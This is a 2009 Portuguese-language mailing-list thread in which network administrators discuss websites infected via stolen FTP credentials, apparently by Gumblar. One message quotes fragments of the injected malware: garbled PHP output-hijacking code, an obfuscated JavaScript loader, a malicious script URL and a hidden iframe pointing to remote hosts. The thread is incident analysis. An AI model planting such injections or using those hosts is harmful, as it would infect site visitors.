[GTER] RES: RES: RES: Virus em sites

NOC NeoGrid security at neogrid.com
Mon Jun 1 15:38:48 -03 2009


Olá Alexandre,

Suspeito fortemente que a máquina do "cliente" que tem acesso FTP ao site, esteja comprometida...

OBS: Pode ter ocorrido algum bloqueio no sistema de AV ou AS... segue o link:
http://eng.registro.br/pipermail/gter/2009-May/023993.html

Att,

Dilson
NOC - Neogrid
www.neogrid.com

-----Mensagem original-----
De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre Gorges
Enviada em: segunda-feira, 1 de junho de 2009 15:29
Para: Lista GTER
Assunto: Re: [GTER] RES: RES: Virus em sites

Não recebi, talvez foi moderado.

Mas vou colocar partes do código, acho que assim não será moderado, visto
que não tem função nenhuma.

Na programação PHP, o código é parecido com esse:

#is’,$s,$a))
foreach($a[0] as $v) if(count(explode(”\n”,$v))>5){
$e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v) ||
preg_match(’#[\(\[](\s*\d+,)20,}#’,$v);
if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strp
os;($v,’[removed]‘)))$s=str_replace($v,”,$s);}
$s1=preg_replace(’##’,”,$s);
if(stristr($s,’body’))
s="preg_replace(’#(\s*body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=">body’)
)>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'
])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_statu
s(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else
$s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob
_start(’tmp_lkojfghx’);for($i=0;$i

Na programação Java Script, o código é tipo assim:

(’%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9c
M75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E’).replace(/TP|NJ
n|HY|uvj|dN|Ss|d6K|cM7/g,""));

Ou então uma chamada para um endereço que carrega o java:

http://b.rtbn2.cn/E/J.JS'

No uso do iframe, o endereço varia muito, mas é algo assim:

iframe 
src="http:%20//%20liteautotoponline%20.cn%20/%20ts%20/%20in.cgi?mozila11"
style="visibility: hidden;" height="4" width="2" iframe

[]'s
Alexandre Gorges
http://algorges.blogspot.com
http://www.dag.eti.br
MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com




> From: NOC NeoGrid <security at neogrid.com>
> Reply-To: Lista GTER <gter at eng.registro.br>
> Date: Mon, 1 Jun 2009 11:03:49 -0300
> To: Lista GTER <gter at eng.registro.br>
> Subject: [GTER] RES:  RES:  Virus em sites
> 
> Bom dia,
> 
> Mandei um "exemplo" do código para saber se era similar ao que foi encontrado
> nos sites de quem iniciou a "thread", mas ninguém respondeu ( nem que sim, nem
> que não ).
> Seria interessante mostrar o que identificaram nos arquivos, assim evitamos
> diversas "possibilidades".
> 
> Att,
> 
> Dilson
> NOC - Neogrid
> www.neogrid.com
> 
> -----Mensagem original-----
> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome
> de Julio Arruda
> Enviada em: segunda-feira, 1 de junho de 2009 10:47
> Para: Grupo de Trabalho de Engenharia e Operacao de Redes
> Assunto: Re: [GTER] RES: Virus em sites
> 
> Alexandre Gorges wrote:
>> Bom dia, Toledo
>> 
>>>> Já foi desconsiderado isso, no servidor não tem nenhum usuário criado.
>>>> Pesquisando pelo malware Gumblar, vi que a senha é descoberta
>>>> na máquina do usuário com spyware. Muitos relatos de senhas
>>>> capturadas com quem usa o Filezilla para acesso ao FTP.
>>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar
>>> justamente aqueles clientes que fazem FTP com vc é infima.
>>> Teriam que infectar milhares para encontrar um que hospeda com você e que
>>> faz ftp.
>>> Além disso, são mais de um cliente seu, o que complica as probabilidade.
>>> Imagino que haja um ponto em comum entre eles(clientes).
>> 
>> Mas eu não estou dizendo que está acontecendo apenas comigo.
>> Se você pesquisar por Gumblar, irá ver vários casos de troca de site por
>> FTP. 
>> De 730 domínios, foram infectados aqui 5 sites. E clientes sem relação entre
>> eles, nem o desenvolvedor dos sites é o mesmo.
>> Um amigo de outro provedor, também relatou mesmo problema. Para alguns
>> clientes apenas.
> 
> Vamos imaginar que somente estes 5 fizeram updates via FTP desde que
> houve o problema ?
> Isto poderia explicar por que os outros nao foram 'contaminados' ?
> Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha,
> mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu
> ao menos daria uma verificada para ver se nao teve algo mais. Obvio que
> e' facil para alguem que nao administra isto falar :-), mas...
> 
> Uma outra coisa que voce pode tentar fazer e' dar uma verificada no
> trafego deste servidor, ver se nao tem sessoes outgoing dele
> 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar
> trafego para porta tcp 6667 outbound.
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter
> 
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter


--
gter list    https://eng.registro.br/mailman/listinfo/gter


More information about the gter mailing list